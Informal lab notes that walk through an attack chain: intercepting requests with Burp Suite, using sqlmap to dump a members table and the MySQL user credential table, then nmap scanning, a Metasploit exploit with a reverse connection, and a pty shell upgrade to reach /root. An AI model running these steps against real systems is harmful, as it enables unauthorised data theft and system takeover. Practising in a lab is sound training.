
Burpsuite

1. Open Burp and turn Intercept on
2. Open Firefox
3. Go to Settings
4. Search for "Proxy"
5. Set the proxy to 127.0.0.1, port 8080
6. Browse to http://burpsuite
7. Download the certificate
8. In Settings, search for "certificate"
9. Import the downloaded certificate
10. Open the link for the vulnerable website
11. Go back to Burp and copy the request
12. Save it as example.req

SQLMAP ADMIN
1. sqlmap -r example.req --dbs (shows all the databases)
2. Answer yes to all the prompts
3. After that, the databases will be shown
4. sqlmap -r example.req -D seattle --tables (use -D because you already know the
specific database you are going into)
5. sqlmap -r example.req -D seattle -T tblMembers --columns (use -T because you
already know the specific table you are going into)
6. sqlmap -r example.req -D seattle -T tblMembers --columns --dump
7. Just press Enter
ALTERNATE WHEN YOU GET BORED
8. cd /tmp/sqlchuhchuchu

SQLMAP ROOT
1. sqlmap -r example.req --dbs (shows all the databases)
2. sqlmap -r example.req -D mysql --tables
3. sqlmap -r example.req -D mysql -T user --columns
4. sqlmap -r example.req -D mysql -T user --columns --dump
ALTERNATE WHEN YOU GET BORED
5. cd /tmp/sqlchuhchuchu

PRIV ESCALATION WITH METASPLOIT


NMAP
1. nmap -T4 -sV -sC (IP address of the vulnerable target)
2. Go to Firefox
3. https://(ip address):(port number that showed up in the nmap output)
4. If the target is not vulnerable, use Metasploit
5. msfconsole
6. To see the vulnerabilities of the target, type searchsploit followed by the target name or IP
7. Go back to msf6 and type search followed by the target name or IP address
8. use 0 (number)
9. show options
10. set RHOST (IP address of the target)
11. set TARGETURI (URL of the target)
12. set LHOST (your Kali IP); run ifconfig to find out your IP
13. show options once you are done and have filled everything in
14. run
15. set SSL true
16. run
17. Type python3 -c 'import pty; pty.spawn("/bin/bash")' to get a Linux-like
interactive shell
18. cd /home/
19. ls
20. cd root
21. ls
